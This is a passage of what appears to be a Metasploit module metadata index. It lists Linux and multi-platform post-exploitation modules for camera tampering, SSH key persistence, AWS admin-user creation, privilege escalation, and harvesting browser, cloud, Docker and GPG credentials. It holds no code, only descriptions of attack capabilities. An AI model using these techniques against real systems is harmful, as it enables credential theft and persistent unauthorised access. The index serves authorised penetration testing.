Camera\n and will allow the user to either freeze the camera and display the last\n image from the video stream, display an image on the camera, or restore\n the camera back to displaying the current feed/stream.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2021-09-03 12:30:12 +0000", - "path": "/modules/post/linux/manage/geutebruck_post_exp.rb", - "is_install_path": true, - "ref_name": "linux/manage/geutebruck_post_exp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "CHANGE_IMAGE", - "description": "Display an arbitrary image instead of the video stream" - }, - { - "name": "FREEZE_CAMERA", - "description": "Freeze the camera and display the last image taken from the video stream" - }, - { - "name": "RESUME_STREAM", - "description": "Resume the camera's video stream and display the current live feed" - } - ] - }, - "post_linux/manage/iptables_removal": { - "name": "IPTABLES rules removal", - "fullname": "post/linux/manage/iptables_removal", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Alberto Rafael Rodriguez Iglesias " - ], - "description": "This module will be applied on a session connected to a shell. 
It will remove all IPTABLES rules.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-08 13:47:34 +0000", - "path": "/modules/post/linux/manage/iptables_removal.rb", - "is_install_path": true, - "ref_name": "linux/manage/iptables_removal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/manage/pseudo_shell": { - "name": "Pseudo-Shell Post-Exploitation Module", - "fullname": "post/linux/manage/pseudo_shell", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Alberto Rafael Rodriguez Iglesias " - ], - "description": "This module will run a Pseudo-Shell.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-02 23:29:48 +0000", - "path": "/modules/post/linux/manage/pseudo_shell.rb", - "is_install_path": true, - "ref_name": "linux/manage/pseudo_shell", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_linux/manage/sshkey_persistence": { - "name": "SSH Key Persistence", - "fullname": "post/linux/manage/sshkey_persistence", - "aliases": [], - "rank": 600, - "disclosure_date": null, - "type": "post", - "author": [ - "h00die " - ], - "description": "This module will add an SSH key to a specified user (or all), to allow\n remote login via SSH at any time.", - "references": [], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-02 23:29:48 +0000", - "path": 
"/modules/post/linux/manage/sshkey_persistence.rb", - "is_install_path": true, - "ref_name": "linux/manage/sshkey_persistence", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/escalate/aws_create_iam_user": { - "name": "Create an AWS IAM User", - "fullname": "post/multi/escalate/aws_create_iam_user", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Javier Godinez ", - "Jon Hart " - ], - "description": "This module will attempt to create an AWS (Amazon Web Services) IAM\n (Identity and Access Management) user with Admin privileges.", - "references": [ - "URL-https://github.com/devsecops/bootcamp/raw/master/Week-6/slides/june-DSO-bootcamp-week-six-lesson-three.pdf" - ], - "platform": "Unix", - "arch": "", - "rport": 443, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/escalate/aws_create_iam_user.rb", - "is_install_path": true, - "ref_name": "multi/escalate/aws_create_iam_user", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/escalate/cups_root_file_read": { - "name": "CUPS 1.6.1 Root File Read", - "fullname": "post/multi/escalate/cups_root_file_read", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-11-20", - "type": "post", - "author": [ - "Jann Horn", - "joev " - ], - "description": "This module exploits a vulnerability in CUPS < 1.6.2, an open source printing system.\n CUPS allows members of the lpadmin 
group to make changes to the cupsd.conf\n configuration, which can specify an Error Log path. When the user visits the\n Error Log page in the web interface, the cupsd daemon (running with setuid root)\n reads the Error Log path and echoes it as plaintext.\n\n This module is known to work on Mac OS X < 10.8.4 and Ubuntu Desktop <= 12.0.4\n as long as the session is in the lpadmin group.\n\n Warning: if the user has set up a custom path to the CUPS error log,\n this module might fail to reset that path correctly. You can specify\n a custom error log path with the ERROR_LOG datastore option.", - "references": [ - "CVE-2012-5519", - "OSVDB-87635", - "URL-https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692791" - ], - "platform": "Linux,OSX", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/escalate/cups_root_file_read.rb", - "is_install_path": true, - "ref_name": "multi/escalate/cups_root_file_read", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk", - "config-changes" - ], - "Reliability": [] - }, - "session_types": [], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/escalate/metasploit_pcaplog": { - "name": "Multi Escalate Metasploit pcap_log Local Privilege Escalation", - "fullname": "post/multi/escalate/metasploit_pcaplog", - "aliases": [], - "rank": 0, - "disclosure_date": "2012-07-16", - "type": "post", - "author": [ - "0a29406d9794e4f9b30b3c5d6702c708" - ], - "description": "Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,\n creates pcap files in /tmp with predictable file names. 
This exploits this by hard-linking these\n filenames to /etc/passwd, then sending a packet with a privileged user entry contained within.\n This, and all the other packets, are appended to /etc/passwd.\n\n Successful exploitation results in the creation of a new superuser account.\n\n This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap\n files and truncate /etc/passwd. Note that if this module fails, you can potentially induce\n a permanent DoS on the target by corrupting the /etc/passwd file.", - "references": [ - "BID-54472", - "URL-http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html", - "URL-https://community.rapid7.com/docs/DOC-1946" - ], - "platform": "BSD,Linux,Unix", - "arch": "", - "rport": 2940, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-01 02:32:23 +0000", - "path": "/modules/post/multi/escalate/metasploit_pcaplog.rb", - "is_install_path": true, - "ref_name": "multi/escalate/metasploit_pcaplog", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "service-resource-loss" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk", - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/apple_ios_backup": { - "name": "Windows Gather Apple iOS MobileSync Backup File Collection", - "fullname": "post/multi/gather/apple_ios_backup", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "hdm ", - "bannedit " - ], - "description": "This module will collect sensitive files from any on-disk iOS device backups", - "references": [], - "platform": "OSX,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": 
"/modules/post/multi/gather/apple_ios_backup.rb", - "is_install_path": true, - "ref_name": "multi/gather/apple_ios_backup", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/aws_ec2_instance_metadata": { - "name": "Gather AWS EC2 Instance Metadata", - "fullname": "post/multi/gather/aws_ec2_instance_metadata", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jon Hart " - ], - "description": "This module will attempt to connect to the AWS EC2 instance metadata service\n and crawl and collect all metadata known about the session'd host.", - "references": [ - "URL-http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html" - ], - "platform": "Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/aws_ec2_instance_metadata.rb", - "is_install_path": true, - "ref_name": "multi/gather/aws_ec2_instance_metadata", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/aws_keys": { - "name": "UNIX Gather AWS Keys", - "fullname": "post/multi/gather/aws_keys", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jon Hart " - ], - "description": "This module will attempt to read AWS configuration files\n (.aws/config, .aws//credentials and .s3cfg) for users discovered\n on the session'd system and extract AWS keys from within.", - "references": [ - 
"URL-http://s3tools.org/kb/item14.htm", - "URL-http://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html#cli-config-files" - ], - "platform": "BSD,Linux,OSX,Solaris,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/aws_keys.rb", - "is_install_path": true, - "ref_name": "multi/gather/aws_keys", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/azure_cli_creds": { - "name": "Azure CLI Credentials Gatherer", - "fullname": "post/multi/gather/azure_cli_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "James Otten ", - "h00die" - ], - "description": "This module will collect the Azure CLI 2.0+ (az cli) settings files\n for all users on a given target. 
These configuration files contain\n JWT tokens used to authenticate users and other subscription information.\n Once tokens are stolen from one host, they can be used to impersonate\n the user from a different host.", - "references": [], - "platform": "Linux,OSX,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-06-27 10:45:05 +0000", - "path": "/modules/post/multi/gather/azure_cli_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/azure_cli_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/check_malware": { - "name": "Multi Gather Malware Verifier", - "fullname": "post/multi/gather/check_malware", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r " - ], - "description": "This module will check a file for malware on VirusTotal based on the checksum.", - "references": [], - "platform": "Linux,OSX,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/check_malware.rb", - "is_install_path": true, - "ref_name": "multi/gather/check_malware", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/chrome_cookies": { - "name": "Chrome Gather Cookies", - "fullname": "post/multi/gather/chrome_cookies", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mangopdf " - ], - 
"description": "Read all cookies from the Default Chrome profile of the target user.", - "references": [], - "platform": "BSD,Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/chrome_cookies.rb", - "is_install_path": true, - "ref_name": "multi/gather/chrome_cookies", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/dbeaver": { - "name": "Gather Dbeaver Passwords", - "fullname": "post/multi/gather/dbeaver", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kali-Team " - ], - "description": "This module will determine if Dbeaver is installed on the target system and, if it is, it will try to\n dump all saved session information from the target. 
The passwords for these saved sessions will then be decrypted\n where possible.", - "references": [ - "URL-https://blog.kali-team.cn/Metasploit-dbeaver-9f42e26241c94ba785dce5f1e69697aa" - ], - "platform": "Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/multi/gather/dbeaver.rb", - "is_install_path": true, - "ref_name": "multi/gather/dbeaver", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "shell", - "powershell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/dbvis_enum": { - "name": "Multi Gather DbVisualizer Connections Settings", - "fullname": "post/multi/gather/dbvis_enum", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "David Bloom" - ], - "description": "DbVisualizer stores the user database configuration in dbvis.xml.\n This module retrieves the connections settings from this file and decrypts the encrypted passwords.", - "references": [], - "platform": "Linux,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/dbvis_enum.rb", - "is_install_path": true, - "ref_name": "multi/gather/dbvis_enum", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/dns_bruteforce": { - "name": "Multi Gather DNS Forward Lookup Bruteforce", - "fullname": "post/multi/gather/dns_bruteforce", - "aliases": [], - "rank": 300, - 
"disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "Brute force subdomains and hostnames via wordlist.", - "references": [], - "platform": "BSD,Linux,OSX,Solaris,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/dns_bruteforce.rb", - "is_install_path": true, - "ref_name": "multi/gather/dns_bruteforce", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/dns_reverse_lookup": { - "name": "Multi Gather DNS Reverse Lookup Scan", - "fullname": "post/multi/gather/dns_reverse_lookup", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - ], - "description": "Performs DNS reverse lookup using the OS included DNS query command.", - "references": [], - "platform": "BSD,Linux,OSX,Solaris,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/dns_reverse_lookup.rb", - "is_install_path": true, - "ref_name": "multi/gather/dns_reverse_lookup", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/dns_srv_lookup": { - "name": "Multi Gather DNS Service Record Lookup Scan", - "fullname": "post/multi/gather/dns_srv_lookup", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez " - 
], - "description": "Enumerates known SRV Records for a given domain using target host DNS query tool.", - "references": [], - "platform": "BSD,Linux,OSX,Solaris,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/dns_srv_lookup.rb", - "is_install_path": true, - "ref_name": "multi/gather/dns_srv_lookup", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/docker_creds": { - "name": "Multi Gather Docker Credentials Collection", - "fullname": "post/multi/gather/docker_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Flibustier" - ], - "description": "This module will collect the contents of all users' .docker directories on the targeted\n machine. 
If the user has already push to docker hub, chances are that the password was\n saved in base64 (default behavior).", - "references": [], - "platform": "BSD,Linux,OSX,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/docker_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/docker_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/electerm": { - "name": "Gather electerm Passwords", - "fullname": "post/multi/gather/electerm", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kali-Team " - ], - "description": "This module will determine if electerm is installed on the target system and, if it is, it will try to\n dump all saved session information from the target. 
The passwords for these saved sessions will then be decrypted\n where possible.", - "references": [ - "URL-https://blog.kali-team.cn/metasploit-electerm-6854f3d868eb45eab6951acc463a910d" - ], - "platform": "Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/multi/gather/electerm.rb", - "is_install_path": true, - "ref_name": "multi/gather/electerm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "shell", - "powershell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/enum_hexchat": { - "name": "Linux Gather HexChat/XChat Enumeration", - "fullname": "post/multi/gather/enum_hexchat", - "aliases": [ - "post/linux/gather/enum_xchat" - ], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sinn3r ", - "h00die" - ], - "description": "This module will collect HexChat and XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. 
The CHATS option will simply download all the\n .log files.", - "references": [ - "URL-https://hexchat.readthedocs.io/en/latest/settings.html" - ], - "platform": "Linux", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/multi/gather/enum_hexchat.rb", - "is_install_path": true, - "ref_name": "multi/gather/enum_hexchat", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "ALL", - "description": "Collect both the configs and chat logs" - }, - { - "name": "CHATS", - "description": "Collect chat logs with a pattern" - }, - { - "name": "CONFIGS", - "description": "Collect config files" - } - ] - }, - "post_multi/gather/enum_software_versions": { - "name": "Multiplatform Installed Software Version Enumerator", - "fullname": "post/multi/gather/enum_software_versions", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "gwillcox-r7" - ], - "description": "This module, when run against a compromised machine, will gather details on all installed software,\n including their versions and if available, when they were installed, and will save it into a loot file for later use.\n Users can then use this loot file to determine what additional vulnerabilites may affect the target machine.\n\n Note that for Linux systems, software enumeration is done via package managers. 
As a result the results may\n not reflect all of the available software on the system simply because users may have installed additional\n software from alternative sources such as source code that these package managers are not aware of.", - "references": [], - "platform": "Android,BSD,Linux,OSX,Solaris,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/multi/gather/enum_software_versions.rb", - "is_install_path": true, - "ref_name": "multi/gather/enum_software_versions", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/enum_vbox": { - "name": "Multi Gather VirtualBox VM Enumeration", - "fullname": "post/multi/gather/enum_vbox", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module will attempt to enumerate any VirtualBox VMs on the target machine.\n Due to the nature of VirtualBox, this module can only enumerate VMs registered\n for the current user, therefore, this module needs to be invoked from a user context.", - "references": [], - "platform": "BSD,Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/enum_vbox.rb", - "is_install_path": true, - "ref_name": "multi/gather/enum_vbox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - 
"actions": [] - }, - "post_multi/gather/env": { - "name": "Multi Gather Generic Operating System Environment Settings", - "fullname": "post/multi/gather/env", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Carlos Perez ", - "egypt " - ], - "description": "This module prints out the operating system environment variables.", - "references": [], - "platform": "Linux,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-08-01 13:37:15 +0000", - "path": "/modules/post/multi/gather/env.rb", - "is_install_path": true, - "ref_name": "multi/gather/env", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "powershell", - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/fetchmailrc_creds": { - "name": "UNIX Gather .fetchmailrc Credentials", - "fullname": "post/multi/gather/fetchmailrc_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jon Hart " - ], - "description": "Post Module to obtain credentials saved for IMAP, POP and other mail\n retrieval protocols in fetchmail's .fetchmailrc", - "references": [], - "platform": "BSD,Linux,OSX,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/fetchmailrc_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/fetchmailrc_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - 
"post_multi/gather/filezilla_client_cred": { - "name": "Multi Gather FileZilla FTP Client Credential Collection", - "fullname": "post/multi/gather/filezilla_client_cred", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "bannedit ", - "Carlos Perez " - ], - "description": "This module will collect credentials from the FileZilla FTP client if it is installed.", - "references": [], - "platform": "BSD,Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/filezilla_client_cred.rb", - "is_install_path": true, - "ref_name": "multi/gather/filezilla_client_cred", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/find_vmx": { - "name": "Multi Gather VMWare VM Identification", - "fullname": "post/multi/gather/find_vmx", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module will attempt to find any VMWare virtual machines stored on the target.", - "references": [], - "platform": "BSD,Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/find_vmx.rb", - "is_install_path": true, - "ref_name": "multi/gather/find_vmx", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - 
"post_multi/gather/firefox_creds": { - "name": "Multi Gather Firefox Signon Credential Collection", - "fullname": "post/multi/gather/firefox_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "bannedit ", - "xard4s", - "g0tmi1k" - ], - "description": "This module will collect credentials from the Firefox web browser if it is\n installed on the targeted machine. Additionally, cookies are downloaded. Which\n could potentially yield valid web sessions.\n\n Firefox stores passwords within the signons.sqlite database file. There is also a\n keys3.db file which contains the key for decrypting these passwords. In cases where\n a Master Password has not been set, the passwords can easily be decrypted using\n 3rd party tools or by setting the DECRYPT option to true. Using the latter often\n needs root privileges. Also be warned that if your session dies in the middle of the\n file renaming process, this could leave Firefox in a non working state. 
If a\n Master Password was used the only option would be to bruteforce.\n\n Useful 3rd party tools:\n + firefox_decrypt (https://github.com/Unode/firefox_decrypt)\n + pswRecovery4Moz (https://github.com/philsmd/pswRecovery4Moz)", - "references": [], - "platform": "BSD,Linux,OSX,Unix,Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/multi/gather/firefox_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/firefox_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/gpg_creds": { - "name": "Multi Gather GnuPG Credentials Collection", - "fullname": "post/multi/gather/gpg_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Dhiru Kholia ", - "Henry Hoggard" - ], - "description": "This module will collect the contents of all users' .gnupg directories on the targeted\n machine. 
Password protected secret keyrings can be cracked with John the Ripper (JtR).", - "references": [], - "platform": "BSD,Linux,OSX,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/gpg_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/gpg_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/grub_creds": { - "name": "Gather GRUB Password", - "fullname": "post/multi/gather/grub_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Garvit Dewan ", - "Taeber Rapczak ", - "Shelby Pace" - ], - "description": "This module gathers GRUB passwords from GRUB bootloader config files.", - "references": [ - "URL-https://help.ubuntu.com/community/Grub2/Passwords#Password_Encryption" - ], - "platform": "BSD,Linux,OSX,Solaris,Unix", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 20:15:08 +0000", - "path": "/modules/post/multi/gather/grub_creds.rb", - "is_install_path": true, - "ref_name": "multi/gather/grub_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_multi/gather/irssi_creds": { - "name": "Multi Gather IRSSI IRC Password(s)", - "fullname": "post/multi/gather/irssi_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jonathan Claudius " - ], - "description": "This module 
